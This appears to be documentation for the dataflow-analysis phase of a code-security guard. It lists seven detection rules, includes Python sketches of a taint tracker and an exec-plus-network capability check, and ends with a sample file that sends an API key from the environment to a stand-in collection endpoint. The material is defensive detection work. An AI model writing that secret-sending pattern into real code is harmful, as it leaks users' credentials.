Pipeline · Phase 4

Behavioural Analysis — source → sink dataflow.

Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the other languages) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command execution, eval). This catches what single-statement regex matching misses, such as a secret that is read in one statement and exfiltrated in another.
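The source-to-sink idea can be sketched in a few lines of Python. This is a minimal illustration, not the analyser's actual implementation: the patterns `SOURCE_RE` and `SINK_RE` and the function `find_flows` are hypothetical names, and the sketch only follows direct variable assignments.

```python
import re

# Hypothetical patterns, for illustration only; the real extractors are not shown here.
SOURCE_RE = re.compile(r"^\s*(\w+)\s*=\s*.*\b(os\.environ|os\.getenv|open\()")
SINK_RE = re.compile(
    r"\b(requests\.(?:post|put|get)|subprocess\.run|os\.system|eval)\s*\((.*)\)"
)


def find_flows(code: str) -> list[tuple[int, int, str]]:
    """Return (source_line, sink_line, variable) for each tainted variable reaching a sink."""
    tainted: dict[str, int] = {}  # variable name -> line where it was assigned from a source
    flows = []
    for lineno, line in enumerate(code.splitlines(), start=1):
        src = SOURCE_RE.search(line)
        if src:
            tainted[src.group(1)] = lineno
            continue
        sink = SINK_RE.search(line)
        if sink:
            args = sink.group(2)
            for var, src_line in tainted.items():
                # A tainted variable appearing in the sink's arguments counts as a flow.
                if re.search(rf"\b{re.escape(var)}\b", args):
                    flows.append((src_line, lineno, var))
    return flows


sample = '''key = os.environ["API_KEY"]
requests.post(url, data=key)
'''
print(find_flows(sample))
```

Neither statement looks alarming on its own; the finding comes from linking the variable assigned on one line to the argument passed on another.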

| Property | Value |
| --- | --- |
| Latency | <200ms |
| Scope | Write / Edit · 6 languages |
| Engine | BehaviouralAnalyser · 7 dataflow rules |
| Score weight | scoring_weights.behavioural, default 2.0 (heaviest) |
| Short-circuit | any CRITICAL finding → deny immediately |
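The short-circuit row could be read as the following decision step. This is a sketch under assumptions: the `Finding` class, the `decide` function and the `"score"` return value are hypothetical and only illustrate that a CRITICAL finding bypasses scoring.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    severity: str  # e.g. "CRITICAL", "HIGH" or "MEDIUM"


def decide(findings: list[Finding]) -> str:
    """Return "deny" as soon as a CRITICAL finding appears; otherwise defer to scoring."""
    for finding in findings:
        if finding.severity == "CRITICAL":
            return "deny"  # short-circuit: scoring is skipped altogether
    return "score"  # placeholder: non-critical findings go on to weighted scoring


print(decide([Finding("DATAFLOW_EVAL", "HIGH"), Finding("DATAFLOW_EXFIL", "CRITICAL")]))
```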

Languages

| Language | Parser | Extensions |
| --- | --- | --- |
| JavaScript / TypeScript | Babel AST | .js .ts .jsx .tsx .mjs .cjs |
| Python | Regex | .py .pyw |
| Shell | Regex | .sh .bash .zsh .fish .ksh |
| Ruby | Regex | .rb .rake .gemspec |
| PHP | Regex | .php .phtml |
| Go | Regex | .go |

The 7 dataflow rules

| Rule | Severity | Detection |
| --- | --- | --- |
| DATAFLOW_EXFIL | CRIT | Secret or credential flows to a network sink |
| DATAFLOW_RCE | CRIT | Network response flows to eval / exec |
| DATAFLOW_CMD_INJECT | HIGH | User input flows to a command execution sink |
| DATAFLOW_EVAL | HIGH | Data flows to eval / Function constructor |
| CAPABILITY_C2 | HIGH | Skill/file has both exec + network capabilities |
| CAPABILITY_EVAL | HIGH | Skill/file uses dynamic code evaluation |
| CROSS_FILE_FLOW | MED | Data crosses file boundaries |
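Unlike the DATAFLOW_* rules, the CAPABILITY_* rules need no path between source and sink, only the presence of certain capabilities in the same file. A rough sketch of a CAPABILITY_C2-style check for Python code follows; the patterns and the function name `has_c2_capability` are hypothetical and far narrower than a real rule would be.

```python
import re

# Hypothetical capability patterns, for illustration only.
EXEC_RE = re.compile(r"\b(subprocess\.\w+|os\.system|os\.popen)\s*\(")
NETWORK_RE = re.compile(r"\b(requests\.\w+|urllib\.request\.\w+|socket\.socket)\s*\(")


def has_c2_capability(code: str) -> bool:
    """True when the file contains both a command-execution call and a network call."""
    return bool(EXEC_RE.search(code)) and bool(NETWORK_RE.search(code))


both = "cmd = requests.get(u).text\nsubprocess.run(cmd, shell=True)\n"
network_only = "page = requests.get(u).text\nprint(page)\n"
print(has_c2_capability(both), has_c2_capability(network_only))
```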

Why it's the heaviest weight

Dataflow tracking tends to produce far fewer false positives than pattern matching alone: a finding means the analyser traced a path from a sensitive source to a dangerous sink in the parsed file, rather than matching a suspicious string in isolation. That is why scoring_weights.behavioural defaults to 2.0 (versus 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.
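To see what a 2.0 weight does in practice, here is a small sketch that combines per-phase scores as a weighted mean. The combination formula, the function `combined_score` and the sample scores are all assumptions for illustration; only the default weights come from the text above.

```python
# Default weights as described above; everything else here is assumed.
DEFAULT_WEIGHTS = {"behavioural": 2.0, "runtime": 1.0, "static": 1.0, "llm": 1.0}


def combined_score(
    scores: dict[str, float], weights: dict[str, float] = DEFAULT_WEIGHTS
) -> float:
    """Weighted mean of per-phase scores (assumed formula, not confirmed by the source)."""
    total_weight = sum(weights[phase] for phase in scores)
    if total_weight == 0:
        return 0.0
    return sum(scores[phase] * weights[phase] for phase in scores) / total_weight


# Made-up per-phase scores: a strong behavioural finding, weak signals elsewhere.
scores = {"behavioural": 0.88, "runtime": 0.10, "static": 0.20, "llm": 0.30}
equal = {phase: 1.0 for phase in scores}

print(round(combined_score(scores), 3))         # default weights
print(round(combined_score(scores, equal), 3))  # all phases weighted equally
```

With these made-up numbers the default weights give roughly 0.47, against 0.37 when every phase counts equally, so a behavioural finding pulls the total up noticeably more than the other phases can pull it down.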

Example

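# leak.py
import os
import requests
url = "https://example.com/collect"      # hypothetical endpoint, for illustration
key = os.environ["API_KEY"]              # source: secret read from the environment
requests.post(url, data=key)             # sink: secret sent over the network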

DATAFLOW_EXFIL · 0.88